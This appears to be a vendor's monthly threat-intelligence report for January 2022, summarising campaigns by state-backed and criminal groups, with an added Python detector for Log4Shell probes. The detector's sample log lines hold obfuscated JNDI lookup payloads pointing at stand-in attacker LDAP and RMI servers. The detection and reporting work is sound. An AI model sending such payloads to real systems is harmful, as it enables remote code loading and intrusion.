Monthly Threat Actor Group Intelligence Report, January 2022 (ENG)

This document is an overview of threat actor group activities analyzed by the NSHC ThreatRecon team, based on data and information collected from 21 December 2021 to 20 January 2022.

1. SectorA Activity Features

Activity by three hacking groups was identified in January 2022: SectorA02, SectorA05 and SectorA07.

SectorA02 group was found to be active in South Korea. The group targeted people working in the field of North Korea policy, using phishing emails disguised as credit card billing statements.

SectorA05 group was found to be active in South Korea and Bulgaria. The group distributed malicious HWP (Hangul Word Processor) documents disguised as documents about North Korean policy.

SectorA07 group was found to be active in Russia. The group sent spear phishing emails targeting staff of a specific country's government institutions and diplomats.

The hacking activities of SectorA groups continue to date and aim to collect high-value information on South Korean government activities, such as political and diplomatic matters, while at the same time conducting hacking activities worldwide to secure financial resources. These objectives have persisted over a long period and are expected to continue unchanged for some time.

2. SectorB Activity Features

Activity by two hacking groups was identified in January 2022: SectorB03 and SectorB43.

SectorB03 group was found to be active in South Korea, the United States of America, China, England, Brazil, Hong Kong, Japan, and Serbia. The group used lure subjects of interest to IT industry workers, such as “Software Engineer”, “Maintenance Engineer” and “Resume”.

SectorB43 group was found to be active in Pakistan, India, Vietnam, Russia, and Japan. In this activity the group targeted a private company in a specific country.

The hacking activities of SectorB groups continue to date and are assessed to aim at collecting high-value information on government activities, such as political and diplomatic matters, with targets worldwide.

3. SectorC Activity Features

Activity by one hacking group was identified in January 2022: SectorC08.

SectorC08 group was found to be active in Ukraine. The group used malicious MS Word documents that rely on the template injection technique: the document loads a remote template when it is opened, and that template downloads PE (Portable Executable) malware onto the target's system and takes control of it.

The hacking activities of SectorC groups continue to date and are assessed to aim at collecting high-value information on government activities, such as political and diplomatic matters, from targets worldwide, including countries bordering the supporting government.

4. SectorD Activity Features

Activity by two hacking groups was identified in January 2022: SectorD02 and SectorD05.

SectorD02 group was found to be active in Saudi Arabia, Russia, Iran, the United States of America, Armenia, Turkey, Austria, and Germany. The group distributed malware disguised as documents about a workshop at a specific university in the United Arab Emirates and collected system information from the infected systems.

SectorD05 group exploited Log4j vulnerabilities and, after gaining access, used new PowerShell-based backdoors such as CharmPower to collect system information or take control of the system.

SectorD groups have mostly conducted hacking activities against countries in political conflict with the supporting government, and recently they have been seen collecting high-value information, such as political and diplomatic activities, on individuals and governments opposed to the supporting government.
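Exploitation of the Log4j lookup vulnerability shows up in web logs as a `${jndi:...}` expression in an attacker-controlled field, most often the User-Agent, and attackers routinely wrap it in other Log4j lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) so that a plain string match on `${jndi:` misses it. The following added example (not code from the report) collapses those lookups the way Log4j evaluates them, inside out, and then extracts the callback host from each probe; the access-log lines are constructed.

```python
"""Detect Log4Shell-style JNDI lookup probes in web server log lines,
including the lookup-obfuscated variants that evade naive "${jndi:" matching.

Added example, not from the report; the log lines below are constructed.
"""
import re
from typing import List, Optional, Tuple

# Innermost ${...} expression: no nested braces inside the body.
INNER = re.compile(r"\$\{([^{}]*)\}")
# A resolved JNDI lookup with a network scheme; group 2 is host[:port].
JNDI = re.compile(r"\$\{\s*jndi:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/}\s]+)", re.I)


def _resolve(body: str) -> Optional[str]:
    """Evaluate the lookups Log4j would evaluate before the jndi one runs.
    Only transformations that need no environment are handled: ${lower:X},
    ${upper:X} and the default-value form ${name:-X} (including the
    degenerate ${::-X}); anything else is left intact."""
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.S)
    if m:
        return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def deobfuscate(s: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost resolvable lookups until nothing
    changes. Unresolvable lookups (${jndi:...}, ${hostname}) stay as-is."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNER.sub(sub, s)
        if not changed:
            break
    return s


def extract_jndi_target(line: str) -> Optional[Tuple[str, str]]:
    """(scheme, host[:port]) of the JNDI callback if the line carries one."""
    m = JNDI.search(deobfuscate(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """1-based line number plus callback scheme and host for every probe."""
    hits = []
    for n, line in enumerate(lines, 1):
        t = extract_jndi_target(line)
        if t:
            hits.append((n, t[0], t[1]))
    return hits


# Constructed access-log lines (Apache combined format); the payload sits
# in the User-Agent field. Line 4 carries a non-JNDI lookup and must not fire.
LOG_LINES = [
    '192.0.2.50 - - [05/Jan/2022:10:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.51 - - [05/Jan/2022:10:14:07 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '192.0.2.52 - - [05/Jan/2022:10:14:09 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.7:1389/x}"',
    '192.0.2.53 - - [05/Jan/2022:10:14:11 +0000] "GET /?q=${hostname} HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '192.0.2.54 - - [05/Jan/2022:10:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${lower:RMI}://198.51.100.9:1099/obj}"',
]

if __name__ == "__main__":
    for n, scheme, host in scan(LOG_LINES):
        print(f"line {n}: JNDI callback {scheme}://{host}")
```

The extracted host is the attacker's LDAP/RMI server and is the pivot for the rest of the investigation: outbound connections to it from the Java host confirm the lookup was actually evaluated, which is what separates a scanned host from an exploited one. Lookups that depend on the runtime environment (`${env:VAR}` or `${sys:prop}` with no default) are not resolved here, so a probe built entirely from those would need the real values to decode.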

5. SectorE Activity Features

Activity by four hacking groups was identified in January 2022: SectorE01, SectorE02, SectorE04 and SectorE05.

SectorE01 group was found to be active in China and Bulgaria. The group distributed malicious RTF documents disguised as coming from a certain country's government institution.

SectorE02 group was found to be active in Pakistan and Bangladesh. The group used Android malware disguised as chat applications to avoid arousing user suspicion.

SectorE04 group was found to be active in Pakistan, England, Sri Lanka, and Singapore. The group distributed malicious MS Word documents using subjects such as “Pakistani Navy” and “Corona”.

SectorE05 group was found to be active in Pakistan, Bangladesh, England, and Hong Kong. The group sent spear phishing emails targeting the police.

The hacking activities of SectorE groups continue to date and are assessed to aim at collecting high-value political, diplomatic and military information. However, considering that they have recently expanded their targets to East Asian countries including China and to other regions, it is assessed that the proportion of activity aimed at collecting political, diplomatic and technology-related information from those countries has increased.

6. SectorH Activity Features

Activity by two hacking groups was identified in January 2022: SectorH01 and SectorH03.

SectorH01 group was found to be active in Germany. The group used PowerPoint documents with embedded malicious macros that download additional malware onto the target's system and execute it to carry out malicious functions.

SectorH03 group was found to be active in France, Sweden, Israel, Yemen, Belarus, Argentina, Palestine, Ukraine, Russia, Morocco, Netherlands, India, and Taiwan. The group used lure documents on various subjects, such as air force candidate selection procedures, aerospace research institutions, and meeting notes on missile systems. When a document is opened, it downloads and executes additional malware that collects system information, clipboard data, and screenshots.

The hacking activities of SectorH groups consist of both cybercrime and government-supported operations. Diplomatic clashes between the backing country and its neighbour India are ongoing, so it is assessed that they will continue activities to collect military and political information on Indian government agencies as needed.

7. Cyber Crime Activity Features

A total of six hacking groups engaged in cybercrime were identified in January 2022: SectorJ03, SectorJ06, SectorJ09, SectorJ10, SectorJ20 and SectorJ26.

Unlike government-supported hacking groups, these groups steal online information that has monetary value in the real world, or directly compromise specific companies and organizations to deploy ransomware on their internal networks or to steal important industrial secrets and demand a ransom under threat of disclosure.

SectorJ03 group was found to be active in Spain, Palestine, China, Israel, and Jordan. The group used Android malware to steal information such as SMS data, photos, and phone call recordings from victims.

SectorJ06 group was found to be active in the United States of America and Israel. The group used Diavol ransomware, which encrypts files using RSA keys and appends the “.lock64” extension to encrypted files.

SectorJ09 group continued its established method of injecting obfuscated skimming scripts into websites to collect usernames, addresses, email addresses, phone numbers, and credit card payment details from payment pages. JavaScript malware in the same format as that identified in previous activity was found.

SectorJ10 group was found to be active in the United States of America. The group used a new ransomware named White Rabbit in attacks targeting American financial companies.

SectorJ20 group was identified in Germany. The group used LNK files disguised as passports; when executed, they download and open PDF files to avoid arousing user suspicion, and download additional malware to carry out malicious functions such as information collection.

SectorJ26 group was found to be active in China, Bulgaria, Russia, the United States of America, Saudi Arabia, India, Azerbaijan, Germany, Japan, Spain, Norway, Britain, Turkey, Iran, Egypt, Canada, Georgia, Italy, Pakistan, Mexico, Vietnam, Lithuania, Libya, Sweden, Malaysia, Poland, the Netherlands, Colombia, France, Hong Kong, Ireland, Singapore, Morocco, Myanmar, Qatar, and Moldova. The group used MS Word documents with embedded macros that create and execute HTA-format scripts, which in turn download backdoor malware to take control of the system.

The full report detailing each event, together with IoCs (Indicators of Compromise) and recommendations, is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net